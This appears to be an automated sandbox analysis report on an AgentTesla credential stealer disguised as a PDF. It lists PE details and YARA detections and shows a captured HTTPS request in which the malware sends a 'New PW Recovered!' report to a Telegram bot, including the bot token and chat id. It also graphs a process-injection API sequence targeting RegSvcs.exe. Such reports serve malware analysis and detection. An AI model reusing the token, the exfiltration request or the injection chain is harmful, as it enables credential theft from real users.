                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x49143e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                  Time Stamp:0x61E14F35 [Fri Jan 14 10:23:49 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x913f00x4b.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x5e4.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x913a50x1c.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000x8f4440x8f600False0.755026700087data7.23442041847IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x920000x5e40x600False0.439453125data4.1825921697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x940000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_VERSION0x920a00x356data
                                                                                                  RT_MANIFEST0x923f80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Version Infos

                                                                                                  DescriptionData
                                                                                                  Translation0x0000 0x04b0
                                                                                                  LegalCopyright2022 Tradewell
                                                                                                  Assembly Version22.0.0.0
                                                                                                  InternalNameWellKnownSidTy.exe
                                                                                                  FileVersion1.1.0.0
                                                                                                  CompanyNameTradewell ltd
                                                                                                  LegalTrademarks
                                                                                                  CommentsPurple Org
                                                                                                  ProductNameBlaster
                                                                                                  ProductVersion1.1.0.0
                                                                                                  FileDescriptionBlaster
                                                                                                  OriginalFilenameWellKnownSidTy.exe

                                                                                                  Network Behavior

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 14, 2022 13:02:29.683715105 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:29.683758974 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:29.683847904 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:29.765074015 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:29.765101910 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:29.833599091 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:29.833743095 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:29.838246107 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:29.838272095 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:29.838629007 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:29.891587973 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:31.658668041 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:31.687493086 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:31.690192938 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:31.733958006 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:31.793011904 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:31.793104887 CET44349834149.154.167.220192.168.2.3
                                                                                                  Jan 14, 2022 13:02:31.793283939 CET49834443192.168.2.3149.154.167.220
                                                                                                  Jan 14, 2022 13:02:31.795567989 CET49834443192.168.2.3149.154.167.220

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 14, 2022 13:02:29.542478085 CET6345653192.168.2.38.8.8.8
                                                                                                  Jan 14, 2022 13:02:29.561613083 CET53634568.8.8.8192.168.2.3

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Jan 14, 2022 13:02:29.542478085 CET192.168.2.38.8.8.80xb165Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Jan 14, 2022 13:02:29.561613083 CET8.8.8.8192.168.2.30xb165No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • api.telegram.org

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.349834149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2022-01-14 12:02:31 UTC0OUTPOST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=---------------------------8d9d7774673e43d
                                                                                                  Host: api.telegram.org
                                                                                                  Content-Length: 1006
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  2022-01-14 12:02:31 UTC0INHTTP/1.1 100 Continue
                                                                                                  2022-01-14 12:02:31 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 64 37 37 37 34 36 37 33 65 34 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 31 32 34 37 39 38 37 37 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 64 37 37 37 34 36 37 33 65 34 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 31 37 39 36 30 35 0a 4f 53 46 75 6c 6c
                                                                                                  Data Ascii: -----------------------------8d9d7774673e43dContent-Disposition: form-data; name="chat_id"2124798776-----------------------------8d9d7774673e43dContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/179605OSFull
                                                                                                  2022-01-14 12:02:31 UTC1INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Fri, 14 Jan 2022 12:02:31 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 632
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  {"ok":true,"result":{"message_id":963,"from":{"id":2122434962,"is_bot":true,"first_name":"w4kejohn","username":"w4kejohnbot"},"chat":{"id":2124798776,"first_name":"John","last_name":"Cena","username":"joebest123","type":"private"},"date":1642161751,"document":{"file_name":"user-179605 2022-01-14 04-02-33.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDw2HhZleXb1Ykqx_02hQAAfmaqmgzrwACTAoAAn7QEFM2orzgquUIdCME","file_unique_id":"AgADTAoAAn7QEFM","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/179605\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Start time:13:00:39
                                                                                                  Start date:14/01/2022
                                                                                                  Path:C:\Users\user\Desktop\20220114080343434.pdf.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\20220114080343434.pdf.exe"
                                                                                                  Imagebase:0x380000
                                                                                                  File size:589824 bytes
                                                                                                  MD5 hash:CD9290D22BB18CED32A1B81814888382
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.306440139.00000000029B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.306278830.00000000028B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:13:00:48
                                                                                                  Start date:14/01/2022
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Imagebase:0xe10000
                                                                                                  File size:45152 bytes
                                                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.558557812.000000000344E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.303933701.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.303933701.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.303547707.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.303547707.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.548274653.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.548274653.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:214
                                                                                                    Total number of Limit Nodes:18

                                                                                                    Graph

                                                                                                    execution_graph 20984 f040d0 20985 f040ec 20984->20985 20986 f0419e 20985->20986 20989 f03898 20985->20989 20993 f042b8 20985->20993 20992 f038a3 20989->20992 20990 f0721f 20990->20985 20992->20990 20998 f06d1c 20992->20998 20994 f042dd 20993->20994 21056 f043b8 20994->21056 21060 f043a9 20994->21060 20999 f06d27 20998->20999 21002 f06d3c 20999->21002 21001 f07325 21001->20992 21003 f06d47 21002->21003 21006 f06d6c 21003->21006 21005 f07402 21005->21001 21007 f06d77 21006->21007 21010 f06d9c 21007->21010 21009 f07502 21009->21005 21012 f06da7 21010->21012 21011 f07c5c 21011->21009 21012->21011 21014 f0bcc7 21012->21014 21015 f0bce9 21014->21015 21016 f0bd0d 21015->21016 21020 f0be35 21015->21020 21025 f0be69 21015->21025 21029 f0be78 21015->21029 21016->21011 21021 f0be4b 21020->21021 21023 f0be93 21020->21023 21021->21016 21022 f0bebf 21022->21016 21023->21022 21033 f0a92c 21023->21033 21028 f0be85 21025->21028 21026 f0bebf 21026->21016 21027 f0a92c 2 API calls 21027->21026 21028->21026 21028->21027 21031 f0be85 21029->21031 21030 f0bebf 21030->21016 21031->21030 21032 f0a92c 2 API calls 21031->21032 21032->21030 21034 f0a937 21033->21034 21035 f0cbb8 21034->21035 21037 f0c754 21034->21037 21038 f0c75f 21037->21038 21039 f06d9c 2 API calls 21038->21039 21040 f0cc27 21039->21040 21044 f0e9a8 21040->21044 21050 f0e998 21040->21050 21041 f0cc60 21041->21035 21045 f0ea25 21044->21045 21047 f0e9d9 21044->21047 21045->21041 21046 f0e9e5 21046->21041 21047->21046 21048 f0ee23 LoadLibraryExW GetModuleHandleW 21047->21048 21049 f0ee28 LoadLibraryExW GetModuleHandleW 21047->21049 21048->21045 21049->21045 21052 f0ea25 21050->21052 21053 f0e9d9 21050->21053 21051 f0e9e5 21051->21041 21052->21041 21053->21051 21054 f0ee23 LoadLibraryExW GetModuleHandleW 21053->21054 21055 f0ee28 LoadLibraryExW GetModuleHandleW 21053->21055 21054->21052 21055->21052 21058 f043df 21056->21058 21057 f044bc 21057->21057 21058->21057 21064 f03e20 21058->21064 21062 f043df 21060->21062 21061 f044bc 21061->21061 21062->21061 21063 f03e20 CreateActCtxA 21062->21063 21063->21061 21065 f05448 CreateActCtxA 21064->21065 21067 f0550b 21065->21067 21068 f0bf90 GetCurrentProcess 21069 f0c00a GetCurrentThread 21068->21069 21071 f0c003 21068->21071 21070 f0c047 GetCurrentProcess 21069->21070 21073 f0c040 21069->21073 21072 f0c07d 21070->21072 21071->21069 21074 f0c0a5 GetCurrentThreadId 21072->21074 21073->21070 21075 f0c0d6 21074->21075 21076 7077700 21077 7077722 21076->21077 21078 7077a5f 21077->21078 21081 70788e0 21077->21081 21086 70788de 21077->21086 21082 70788fd 21081->21082 21091 7078d30 21082->21091 21102 7078d1f 21082->21102 21083 707893d 21083->21077 21087 70788fd 21086->21087 21089 7078d30 12 API calls 21087->21089 21090 7078d1f 12 API calls 21087->21090 21088 707893d 21088->21077 21089->21088 21090->21088 21092 7078d4a 21091->21092 21113 70792e7 21092->21113 21117 707944a 21092->21117 21121 707965a 21092->21121 21130 707959a 21092->21130 21141 7078ecb 21092->21141 21146 7079510 21092->21146 21151 7079211 21092->21151 21156 7079332 21092->21156 21093 7078d78 21093->21083 21103 7078d4a 21102->21103 21105 70792e7 2 API calls 21103->21105 21106 7079332 2 API calls 21103->21106 21107 7079211 2 API calls 21103->21107 21108 7079510 2 API calls 21103->21108 21109 7078ecb 2 API calls 21103->21109 21110 707959a 6 API calls 21103->21110 21111 707965a 4 API calls 21103->21111 21112 707944a 2 API calls 21103->21112 21104 7078d78 21104->21083 21105->21104 21106->21104 21107->21104 21108->21104 21109->21104 21110->21104 21111->21104 21112->21104 21161 70771e0 21113->21161 21165 70771d8 21113->21165 21114 7079309 21169 7079ca0 21117->21169 21174 7079c90 21117->21174 21118 707946b 21122 7079663 21121->21122 21187 7076ea3 21122->21187 21191 7076ea8 21122->21191 21123 707969e 21124 7079999 21123->21124 21195 70770f0 21123->21195 21199 70770e8 21123->21199 21124->21093 21125 70797a8 21203 7076f58 21130->21203 21207 7076f53 21130->21207 21131 70795b4 21139 7076ea3 ResumeThread 21131->21139 21140 7076ea8 ResumeThread 21131->21140 21132 7079999 21132->21093 21133 707969e 21133->21132 21137 70770f0 WriteProcessMemory 21133->21137 21138 70770e8 WriteProcessMemory 21133->21138 21134 70797a8 21137->21134 21138->21134 21139->21133 21140->21133 21142 7078edb 21141->21142 21211 707736c 21142->21211 21215 7077378 21142->21215 21147 7079532 21146->21147 21148 7079570 21146->21148 21149 70770f0 WriteProcessMemory 21147->21149 21150 70770e8 WriteProcessMemory 21147->21150 21149->21148 21150->21148 21152 707922a 21151->21152 21154 70770f0 WriteProcessMemory 21152->21154 21155 70770e8 WriteProcessMemory 21152->21155 21153 7079271 21153->21093 21154->21153 21155->21153 21157 707933b 21156->21157 21158 707900a 21157->21158 21159 7076f53 SetThreadContext 21157->21159 21160 7076f58 SetThreadContext 21157->21160 21159->21158 21160->21158 21162 707722b ReadProcessMemory 21161->21162 21164 707726f 21162->21164 21164->21114 21166 707722b ReadProcessMemory 21165->21166 21168 707726f 21166->21168 21168->21114 21170 7079cba 21169->21170 21179 7077030 21170->21179 21183 7077028 21170->21183 21171 7079cf5 21171->21118 21175 7079cba 21174->21175 21177 7077030 VirtualAllocEx 21175->21177 21178 7077028 VirtualAllocEx 21175->21178 21176 7079cf5 21176->21118 21177->21176 21178->21176 21180 7077070 VirtualAllocEx 21179->21180 21182 70770ad 21180->21182 21182->21171 21184 7077021 21183->21184 21184->21183 21185 707707a VirtualAllocEx 21184->21185 21186 70770ad 21185->21186 21186->21171 21188 7076ea9 ResumeThread 21187->21188 21190 7076f19 21188->21190 21190->21123 21192 7076ee8 ResumeThread 21191->21192 21194 7076f19 21192->21194 21194->21123 21196 7077138 WriteProcessMemory 21195->21196 21198 707718f 21196->21198 21198->21125 21200 7077138 WriteProcessMemory 21199->21200 21202 707718f 21200->21202 21202->21125 21204 7076f9d SetThreadContext 21203->21204 21206 7076fe5 21204->21206 21206->21131 21208 7076f46 21207->21208 21208->21207 21209 7076fbd SetThreadContext 21208->21209 21210 7076fe5 21209->21210 21210->21131 21212 7077401 CreateProcessA 21211->21212 21214 70775c3 21212->21214 21216 7077401 CreateProcessA 21215->21216 21218 70775c3 21216->21218 21219 f0c1b8 DuplicateHandle 21220 f0c24e 21219->21220 21221 f09b98 21222 f09ba7 21221->21222 21225 f09c90 21221->21225 21233 f09c80 21221->21233 21226 f09ca3 21225->21226 21227 f09cbb 21226->21227 21241 f09f18 21226->21241 21245 f09f17 21226->21245 21227->21222 21228 f09cb3 21228->21227 21229 f09eb8 GetModuleHandleW 21228->21229 21230 f09ee5 21229->21230 21230->21222 21234 f09ca3 21233->21234 21236 f09cbb 21234->21236 21239 f09f17 LoadLibraryExW 21234->21239 21240 f09f18 LoadLibraryExW 21234->21240 21235 f09cb3 21235->21236 21237 f09eb8 GetModuleHandleW 21235->21237 21236->21222 21238 f09ee5 21237->21238 21238->21222 21239->21235 21240->21235 21243 f09f2c 21241->21243 21242 f09f51 21242->21228 21243->21242 21249 f09000 21243->21249 21246 f09f2c 21245->21246 21247 f09f51 21246->21247 21248 f09000 LoadLibraryExW 21246->21248 21247->21228 21248->21247 21250 f0a0f8 LoadLibraryExW 21249->21250 21252 f0a171 21250->21252 21252->21242 21253 7079d78 21254 7079f03 21253->21254 21255 7079d9e 21253->21255 21255->21254 21258 7079ff0 PostMessageW 21255->21258 21260 7079ff8 PostMessageW 21255->21260 21259 707a064 21258->21259 21259->21255 21261 707a064 21260->21261 21261->21255

                                                                                                    Executed Functions

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 70765914fdf1a19a193879a41f5e26f681ef2ec6d9e296473ab64cc9ca80eaae
                                                                                                    • Instruction ID: a3a7025c75913e015b35aab9c6bc9000d709a7badbf443a66661dccb57d59b7b
                                                                                                    • Opcode Fuzzy Hash: 70765914fdf1a19a193879a41f5e26f681ef2ec6d9e296473ab64cc9ca80eaae
                                                                                                    • Instruction Fuzzy Hash: AA81D0B0D15218CBDB90CFA9C9887EDBBF5BB49305F10D62AD419E7280DB389985CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F0BFF0
                                                                                                    • GetCurrentThread.KERNEL32 ref: 00F0C02D
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F0C06A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F0C0C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: d4e269333c562cdfb75852e7b1c44ee628dc0c91f0f537167d1406f7241885e7
                                                                                                    • Instruction ID: 3bfa09afa6345cf444120456de72e3f39483bc9bfbfceabff3524eecded358df
                                                                                                    • Opcode Fuzzy Hash: d4e269333c562cdfb75852e7b1c44ee628dc0c91f0f537167d1406f7241885e7
                                                                                                    • Instruction Fuzzy Hash: 7B5154B090064ACFDB10CFA9D5887DEBBF1EF89314F24856AE509A72A1C7786844CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F0BFF0
                                                                                                    • GetCurrentThread.KERNEL32 ref: 00F0C02D
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F0C06A
